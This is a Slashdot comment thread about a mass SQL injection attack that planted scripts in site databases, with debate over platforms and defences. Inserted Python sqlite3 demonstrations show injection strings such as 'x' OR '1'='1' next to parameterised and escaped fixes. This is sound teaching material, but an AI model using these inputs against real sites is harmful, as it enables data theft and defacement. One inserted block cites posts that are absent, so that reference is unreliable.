People have done SQL injection attacks on Apache servers and probably most other servers. It seems as though this flaw is made easier on a misconfigured server, but you can misconfigure any software that uses a configuration file. It's easiest when the configuration isn't validated correctly, or when it's impossible to determine all invalid cases, or when a case may be invalid only under certain circumstances. All of these are bound to crop up on something like Apache.

Besides, there must be bugs elsewhere, or the article writer wouldn't have repeated an already-corrected folly of confusing pages with servers.

Re:How does Apache avoid this? (1)

blowdart (31458) | more than 6 years ago | (#23230938)

A mild correction: no-one runs a SQL injection attack against a web server; it's against the software that runs on that web server. So strictly no-one runs a SQL injection attack against Apache, as Apache by default does not use any SQL database; it's the same situation with IIS.

Bogus dupe of bogus story (0)

Anonymous Coward | more than 6 years ago | (#23230858)

It's not. The summary is bogus, just like when it was when it got posted last week.

Re:How does Apache avoid this? (1)

Foofoobar (318279) | more than 6 years ago | (#23230872)

Simple answer. mysql_real_escape_string [shiflett.org] . Instead of sanitizing data through the language, which will miss byte-encoded strings, a lot of applications have switched to using MySQL's native mysql_real_escape_string, which will catch these. Java sanitizes byte code strings as well, I believe.

So it may be partially C# or just that Microsoft web devs are inherently 'dumber'.

Re:How does Apache avoid this? (1)

blowdart (31458) | more than 6 years ago | (#23231028)

ASP.NET sanitises by default; in fact it won't let certain strings be submitted as part of a form, to protect against XSS. You have to specifically turn that off. C# also provides parametrised queries specifically to escape strings properly with any .NET data provider.

A belief in the superiority of PHP developers isn't helpful, nor is it correct. I give a bunch of talks each year on this very topic and the number of shocked PHP developers is pretty much the same as the number of shocked ASP.NET developers. Part of the problem is no school teaches this stuff; security does not seem to be a part of any degree course I've encountered. Part of it is that the basic teach-yourself books don't cover it either; ASP.NET/PHP for Dummies will not list it, and database texts certainly don't, as it's not part of their domain. WordPress, Movable Type and Joomla! have all had SQL injection problems; Oracle has a great one right now, to do with date parsing, which is a database-level problem that defensive coding may not even catch. It's not a question of one platform's developers being dumber, it's because no-one has ever warned them.

Re:How does Apache avoid this? (0)

Anonymous Coward | more than 6 years ago | (#23231110)

Oh good lord... 1998 called, and they want their bad ideas back.

Just use prepared statements, like every other decent developer in the world. Or even better, use stored procedures exclusively, and don't give your web stack insert, update, select, or delete permissions on your database.

Re:How does Apache avoid this? (1)

Joe U (443617) | more than 6 years ago | (#23231000)

Because the automated injection script was written for asp/asp.net and Apache rarely uses asp or asp.net.

Please scan your news sites for past and future php scripts if it makes you feel any better.

Re:How does Apache avoid this? (0)

Anonymous Coward | more than 6 years ago | (#23231022)

The exploit depends on a chunk of SQL that targets only Microsoft SQL Server [hackademix.net] . The Slashdot "editors" think this is an IIS exploit because they don't know that IIS and MS SQL Server are two different products.

If someone wrote a generic script that targetted MySQL, I'm sure the idiots at Slashdot would post an article about a security hole in PHP.

Re:How does Apache avoid this? (1)

cliveholloway (132299) | more than 6 years ago | (#23231198)

There are two parts to this:

- no untainting of CGI data
- bad DB interaction practices

Now, I don't do ASP, so I'm unaware of the exact details, but in Perl (and any CGI language), it's always insane NOT to untaint your input submitted by users - even if (especially if!) you have set the values in hidden fields. Something like

use strict; use warnings;
use CGI; my $q = CGI->new;   # $q->param() reads the submitted form values
my $id=0; # $id must be an integer under 100
$q->param('id') =~ /^(\d{1,2})$/
        and $id = $1;

And, as to the SQL injection itself, if ASP doesn't have placeholders, I would blame Microsoft. Interpolating fields into DB statements is just asking for trouble.
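The pattern in graveyhead's PHP one-liner above (request value glued into the SQL text), the placeholder approach Tim C and the AC recommend (JDBC PreparedStatement), and the allowlist check in cliveholloway's Perl, carried through in Python with the standard library's sqlite3 module. This is an added example, not code from any poster or from the page; the users table, its three rows and the request values are constructed here, and SQLite stands in for whichever database engine a real site would use.

```python
import re
import sqlite3

# Constructed sample table for the demonstration (not data from the page).
SAMPLE_ROWS = [(1, "alice", 0), (2, "bob", 0), (3, "carol", 1)]


def make_db():
    """In-memory SQLite database holding a small users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_concat(conn, foo):
    """The vulnerable shape: the request value is concatenated into the SQL text,
    so whatever the user sent is parsed as part of the statement."""
    sql = "SELECT id, name FROM users WHERE name = '" + foo + "'"
    return conn.execute(sql).fetchall()


def lookup_param(conn, foo):
    """The hardened shape: a placeholder (what PreparedStatement does in Java).
    The value travels separately from the statement and is only ever a literal."""
    return conn.execute("SELECT id, name FROM users WHERE name = ?", (foo,)).fetchall()


def untaint_id(raw):
    """Allowlist check in the spirit of the Perl regex above: accept a one- or
    two-digit id, otherwise fall back to 0. Anything that is not purely digits,
    SQL fragments included, is rejected before it gets anywhere near a query."""
    m = re.fullmatch(r"\d{1,2}", raw)
    return int(m.group(0)) if m else 0


def lookup_by_id(conn, raw_id):
    """Validation and a placeholder together: the id is checked, then bound."""
    return conn.execute("SELECT id, name FROM users WHERE id = ?", (untaint_id(raw_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    benign = "alice"
    hostile = "x' OR '1'='1"   # constructed request value that is not a name at all
    print("concat, benign: ", lookup_concat(db, benign))
    print("concat, hostile:", lookup_concat(db, hostile))   # every row comes back
    print("param, hostile: ", lookup_param(db, hostile))    # no row has that literal name
    print("id '7':         ", lookup_by_id(db, "7"), "(accepted as", untaint_id("7"), ")")
    print("id '1 OR 1=1':  ", lookup_by_id(db, "1 OR 1=1"), "(rejected to", untaint_id("1 OR 1=1"), ")")
```

The concatenated query returns all three rows for the hostile value because the quote in the input ends the string literal and the rest is parsed as SQL; the parameterised query returns nothing because the whole value is compared as one literal. The regex check is the Perl idiom in the post: it does not try to recognise bad input, it only lets a known-good shape through.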

FF fanboi? (0)

Anonymous Coward | more than 6 years ago | (#23230602)

So... a server side exploit is "defeated" with a client side browser + extension.

In case you go to a malicious site that makes you SQL exploit a 3rd party site?

Bad Language makes Bad Programs (1)

MarcAuslander (517215) | more than 6 years ago | (#23230662)

Bad language leads to bad programs. Classic example - C doesn't associate lengths with strings or arrays - and buffer overflows result. A SQL interface that requires/allows constructing strings which mix syntax and user data is asking for trouble. You can blame the programmer for not validating the input data - but unless you provide the validation tool, it's still your fault - you the language designer.

Re:Bad Language makes Bad Programs (1)

ForumTroll (900233) | more than 6 years ago | (#23230992)

Bad programmers write bad code despite the language. I don't want to use a language that places a ridiculous number of restrictions on me merely because someone somewhere might find a way to fuck up. Furthermore, validating input is a library problem not a language problem, and practically every language has libraries for escaping input. Nobody is to blame but the developers of the project being exploited.

Re:Bad Language makes Bad Programs (1)

Wrath0fb0b (302444) | more than 6 years ago | (#23231142)

> Bad language leads to bad programs. Classic example - C doesn't associate lengths with strings or arrays - and buffer overflows result. A SQL interface that requires/allows constructing strings which mix syntax and user data is asking for trouble. You can blame the programmer for not validating the input data - but unless you provide the validation tool, it's still your fault - you the language designer.

Rubbish! You can have my C-style arrays when you pry them from my cold dead hands because, for my particular purpose, I don't need every access to check the bounds of the arrays. Please stop attempting to have the language force me to use the coding conventions that you prefer - the language should provide both safe and unsafe array access. This is the beauty of the C++ STL vector class: it provides all the tools without judgment.

Let's take a stupidly simple example -- I want to write a function that returns the sum of a vector
template <class T>
inline T sum(const vector<T> &v) {
        T _sum = 0;
        for(unsigned i = 0, s = v.size(); i < s; ++i)
                _sum += v[i]; // NO NEED TO CHECK 'i' -- GUARANTEED TO BE IN BOUNDS //
        return _sum;
}

Sorry, Java users, your language specification will not allow you to access an array without a bounds-check (see the Java Language Spec, http://java.sun.com/docs/books/jls/third_edition/html/arrays.html#10.4 [sun.com] ). You are just SOL. I did a quick test summing up 10000000 random integers using the code above, and an identical version using vector.at() which does bounds-checking. The performance difference was greater than 3 times.

Here's the code if you don't believe me:

APPENDIX:

#include <iostream>
#include <vector>
#include <ctime>
#include <cstdlib>   // rand()

using namespace std;

// Unchecked access: operator[] trusts the caller to stay in bounds.
template <class T>
inline T sum_fast(const vector<T> &v) {
        T sum = 0;
        for(unsigned i = 0, s = v.size(); i < s; ++i)
                sum += v[i];
        return sum;
}

// Checked access: at() throws std::out_of_range on a bad index.
template <class T>
inline T sum_slow(const vector<T> &v) {
        T sum = 0;
        for(unsigned i = 0, s = v.size(); i < s; ++i)
                sum += v.at(i);
        return sum;
}

int main(void) {
        vector<int> a(10000000);
        for(unsigned i = 0, s = a.size(); i < s; ++i)
                a[i] = rand();

        clock_t start1 = clock();
        int res1 = sum_fast(a);
        clock_t end1 = clock();
        cout << res1 << " computed in " << end1 - start1 << " cycles\n";

        clock_t start2 = clock();
        int res2 = sum_slow(a);
        clock_t end2 = clock();
        cout << res2 << " computed in " << end2 - start2 << " cycles\n";
}

Produces the following output (MSVC 2K5 EE, all optimizations on)
614261309 computed in 15 cycles
614261309 computed in 47 cycles

Re:Bad Language makes Bad Programs (1)

Jaime2 (824950) | more than 6 years ago | (#23231186)

> but unless you provide the validation tool, it's still your fault - you the language designer

I'll bet 90% of the coding errors were done by developers who said "I hate those Visual Studio wizards Microsoft has for data access. I can do it better myself." Sure, the wizards aren't the best way to build an application, but at least they prevent SQL injection. I meet these people every day... they think they know a lot about programming, but really they are people with 20 years of experience just barely making applications work and developing more and more bad practices every day.

It's fine to reject the tools you are given. But if you reject them, at least have a better plan. ASP.Net has easy to use form validation tools, easy to use SQL injection preventing GUI data access tools, and easy to use base classes that prevent SQL injection. The people who made these problems avoided using about twenty tools at their disposal for avoiding this class of bug. This is certainly not Microsoft's fault.

Re:Bad Language makes Bad Programs (1)

XMyth (266414) | more than 6 years ago | (#23231248)

Microsoft is working towards eliminating the root of this problem (the problem being tunneled languages like SQL) with the addition of LINQ to .NET.

Why can't they block/blacklist domains? (1)

stun (782073) | more than 6 years ago | (#23230676)

Why can't they (the big guys) create an "Internet Police" to blacklist
certain domains from the Internet that are spreading that malware?

I have read the news that some people have been working on finding out sites with malware on it using Google.
  1. Have the "Internet Police" contact the Web Admin of the "offending" site to clean up their own server.
  2. If they don't clean it up after a certain time, stop performing the DNS.


Ok, I *do* realize that this is really difficult and comes with a crapload of legal and drama issues,
but I say we have to start from somewhere to take action on this.

And of course, some countries make it difficult (if not impossible)
to track down those malware spreaders *coughRussiacoughForExample* http://www.technewsworld.com/story/33127.html?welcome=1209421471/ [technewsworld.com]
and http://www.technewsworld.com/story/Researchers-Shed-Light-on-Shadowy-Russian-Botnets-60640.html/ [technewsworld.com] .

Now I say "Fuck those Russian bastards and their corrupted government and law enforcement agencies."

Coldfusion Anyone? (1)

oni (41625) | more than 6 years ago | (#23230726)

Has anyone ever heard of a SQL injection vulnerability in a Coldfusion app? I know some smartass is going to say, "that's because nobody uses it" but that's not true. If there are a million ASP apps out there and 500,000 SQL injection vulnerabilities, then there have to be at least 100,000 coldfusion sites. Show me the 50,000 coldfusion SQL injections. Or show me 10,000, or 5,000 or even just 1.

I have some experience with coldfusion and it is my opinion that a SQL injection vulnerability is pretty difficult to create even when you intend to create one. The reason is because, unlike every other language (java, ruby, PHP, etc.) coldfusion doesn't have this idea that you take any old random string and pass it off to the ODBC. Instead, you build the query inside special tags, and the interpreter can keep an eye out for errant quotes.

A SQL injection vulnerability in ColdFusion will involve a special function, preserveSingleQuotes(), that you only need in very rare circumstances.

So maybe everyone should switch to a safer language, eh?

Re:Coldfusion Anyone? (2, Informative)

S'harien (779928) | more than 6 years ago | (#23230954)

ColdFusion is most certainly vulnerable to SQL injection if you are not religiously using the CFQUERYPARAM tag inside your queries. Of course the database being queried needs to support multiple SQL statements in a single query (MySQL does, Access does not, can't speak for any others). http://www.adobe.com/devnet/coldfusion/articles/cfqueryparam.html [adobe.com]

Re:Coldfusion Anyone? (1)

isorox (205688) | more than 6 years ago | (#23231044)

> Instead, you build the query inside special tags, and the interpreter can keep an eye out for errant quotes.

It's called a prepared statement.

Re:Coldfusion Anyone? (0)

Anonymous Coward | more than 6 years ago | (#23231050)

ColdFusion is no more invulnerable to SQL injection than any other language and/or framework. The *only* thing it has in place by default is that, beginning with CF6, single quotes were auto-escaped when used with cfquery, unless PreserveSingleQuotes() is used, in which case it's not even of any value there. That said, any injection attack that does not require the use of single quotes (e.g. an integer-based attack) will succeed without an aftermarket mitigation strategy in place (e.g. parameterized queries, manual input validation or stored procs).
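What the AC means by an integer-based attack getting past automatic single-quote escaping, shown in Python with sqlite3. This is an added example, not ColdFusion code or anything from the page: escape_quotes is a stand-in for the quote-doubling the post describes, and the users table and request values are constructed.

```python
import sqlite3

# Constructed sample table (not data from the page).
SAMPLE_ROWS = [(1, "alice", 0), (2, "bob", 0), (3, "carol", 1)]


def make_db():
    """In-memory SQLite database holding a small users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def escape_quotes(value):
    """Stand-in for an automatic single-quote escaper: doubles every quote,
    which neutralises a value only when the SQL wraps that value in quotes."""
    return value.replace("'", "''")


def by_name_escaped(conn, raw_name):
    """String context: the escaper does its job here, because the value sits
    between quotes and a quote in the input can no longer close the literal."""
    sql = "SELECT id, name FROM users WHERE name = '" + escape_quotes(raw_name) + "'"
    return conn.execute(sql).fetchall()


def by_id_escaped(conn, raw_id):
    """Integer context: no quotes surround the value, so doubling quotes
    changes nothing and whatever was submitted is parsed as SQL."""
    sql = "SELECT id, name FROM users WHERE id = " + escape_quotes(raw_id)
    return conn.execute(sql).fetchall()


def by_id_param(conn, raw_id):
    """Parameterised query (the CFQUERYPARAM / PreparedStatement advice in this
    thread): the value is bound, never parsed, whatever it contains."""
    return conn.execute("SELECT id, name FROM users WHERE id = ?", (raw_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("name, escaped:   ", by_name_escaped(db, "x' OR '1'='1"))   # [] - escaping worked
    print("id, escaped:     ", by_id_escaped(db, "2 OR 1=1"))         # all rows - escaping irrelevant
    print("id, parameter:   ", by_id_param(db, "2 OR 1=1"))           # [] - bound as a literal
    print("id, parameter 2: ", by_id_param(db, "2"))                  # [(2, 'bob')]
```

Escaping is a property of the surrounding SQL text, not of the value: the same escaper that protects the quoted name column does nothing for the unquoted id column. Binding the value does not depend on context, which is why the thread's repeated advice is placeholders rather than escaping.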

Re:Coldfusion Anyone? (1)

CodeBuster (516420) | more than 6 years ago | (#23231092)

> I have some experience with coldfusion

ColdFusion is dead or dying. You are the first person that I have heard mention it in years. If people are going to choose a proprietary solution for their web application server needs then they generally choose IIS with ASP.NET; otherwise the choice is probably PHP on Apache or Ruby on Rails.

> So maybe everyone should switch to a safer language, eh?

The problem here is not the language, it is the use of that language in ways that are specifically warned against as being dangerous. The power to create complex applications brings with it the possibility of self-destruction. The addition of power tools to your wood shop can expand productivity and open up new types of projects which were previously unavailable to you. On the other hand, you have to be careful with that circular saw or you might lose a few fingers. Power and complexity vs safety and simplicity but with limitations are trade-offs that every developer must make.

Re:Coldfusion Anyone? (1)

kiddygrinder (605598) | more than 6 years ago | (#23231098)

Nice idea, but I think the problem is more people doing things on the cheap instead of getting a real web dev, so I don't think telling people to spend a large chunk of cash on ColdFusion is going to fix it.

Re:Coldfusion Anyone? (1)

Sancho (17056) | more than 6 years ago | (#23231226)

If I were guessing, I'd say that Coldfusion has a fairly low market share. The main reason that I'd say this is that it's a) an expensive solution that b) isn't Microsoft.

Lots of people pick free solutions. Lots of people who don't pick free solutions know about IIS and MS SQL. They stick with Microsoft because it's the brand, and it's a one-stop shop for support. There are also a lot more VBS/.Net developers than Coldfusion ones, so developers will be cheaper.

That said, there are 38,000 hits from Google for coldfusion sql injection. Most of the hits in the first few pages aren't talking about how Coldfusion is magically immune. While that doesn't mean that it isn't, I know where I'd lay my money if I were a betting man.

Re:Coldfusion Anyone? (1)

XMyth (266414) | more than 6 years ago | (#23231264)

I'd rather eat cat vomit than write web apps with ColdFusion.

Thanks for the suggestion though.

Idiots. (-1, Flamebait)

Anonymous Coward | more than 6 years ago | (#23230770)

I would hope that idiots stop claiming this as a microsoft thing.

Because little do you know, PHP and MySQL are far worse for this crap happening.

Either way, it's not MS's tech fault that people are idiotic coders.

Let alone that those same idiotic coders don't run any baseline analyzing tools provided by microsoft to catch this shit!

Same Security Measures Apply Since 1996 (0)

Anonymous Coward | more than 6 years ago | (#23230816)

Hey, um, the same security guidelines for working with SQL code and various languages haven't changed in over a decade, guys... c'mon, this is really a pathetic takeover of the industry by people with the strongest immune systems and worst hygiene.

*puts on safety glasses*

Quicky Question (1)

udippel (562132) | more than 6 years ago | (#23231052)

From what I understand from just flipping through the summary,

> The attack itself injects some malicious JavaScript code into every text field in your database, the Javascript then loads an external script that can compromise a user's PC

the infection requires that a local user on that database box browses the net, and hits a malicious site?

I really wonder if users on a database-running PC are supposed to browse the net, for pr0n, or what?

Am I correct that my fictitious boxen are free from danger, if I have no local losers' accounts for surfing?

Re:Quicky Question (2, Informative)

cervo (626632) | more than 6 years ago | (#23231136)

I think you misunderstand the article. The attack injects javascript code into the text fields of the database. The attack is done by someone exploiting SQL injection on the website. Nothing to do with a web surfing account on the database computer. The attack inserts Javascript into every text field. If it was a message forum, this might be the from fields of an e-mail, the message text of posts, the subject fields of posts, etc.... Regular users using the forum are suddenly exposed to the javascript.
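The last step cervo describes, a script tag sitting in a text column and reaching everyone who views the forum, and the output-side control that makes it inert, as an added Python example (not code from the page). INJECTED_VALUE is constructed to resemble such a field and its script URL is a placeholder, not the address used in the real attack.

```python
import html

# Constructed sample of what a text column might hold after a mass injection:
# the original content with a script tag appended. The URL is a placeholder.
INJECTED_VALUE = 'Great post!<script src="http://example.invalid/x.js"></script>'


def render_unescaped(value):
    """Emit a database value straight into the page: the appended tag becomes
    live script in every visitor's browser, which is how the stored payload
    in the story reaches end users."""
    return "<td>" + value + "</td>"


def render_escaped(value):
    """Encode the value for an HTML text context. The stored markup is shown
    as literal text and never executes, whatever got into the column."""
    return "<td>" + html.escape(value, quote=True) + "</td>"


def contains_script_tag(fragment):
    """Coarse check used only to compare the two renderings here; it is not a
    filter to rely on, since attackers control the exact bytes."""
    return "<script" in fragment.lower()


if __name__ == "__main__":
    print(render_unescaped(INJECTED_VALUE))   # tag intact: executes in the browser
    print(render_escaped(INJECTED_VALUE))     # &lt;script ...&gt;: rendered as text
```

Output encoding is the complement of the parameterised queries discussed above, not a replacement: placeholders keep the script out of the database, encoding keeps whatever is already there from running in visitors' browsers.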

Again (1)

isorox (205688) | more than 6 years ago | (#23231060)

Wow, that's awful, so soon after the last issue [slashdot.org] ?

little-bobby-tables-strikes-again dept (2, Funny)

cyberstealth1024 (860459) | more than 6 years ago | (#23231090)

> from the little-bobby-tables-strikes-again dept.

Awesome xkcd reference! http://xkcd.com/327/ [xkcd.com]

The only story here... (1)

NullProg (70833) | more than 6 years ago | (#23231218)

Is that Linux, BSD, Sun, AIX, and whatever are just as vulnerable when it comes to dumb programmers.

The million dollar question is what platform and which web server is it easier to reinstall to get the site back up.
I think Linux and BSD have the advantage.

Enjoy,

In related news... (1)

gmuslera (3436) | more than 6 years ago | (#23231376)

Half a Million Slashdot-Powered Stories Hit with Dupe Injection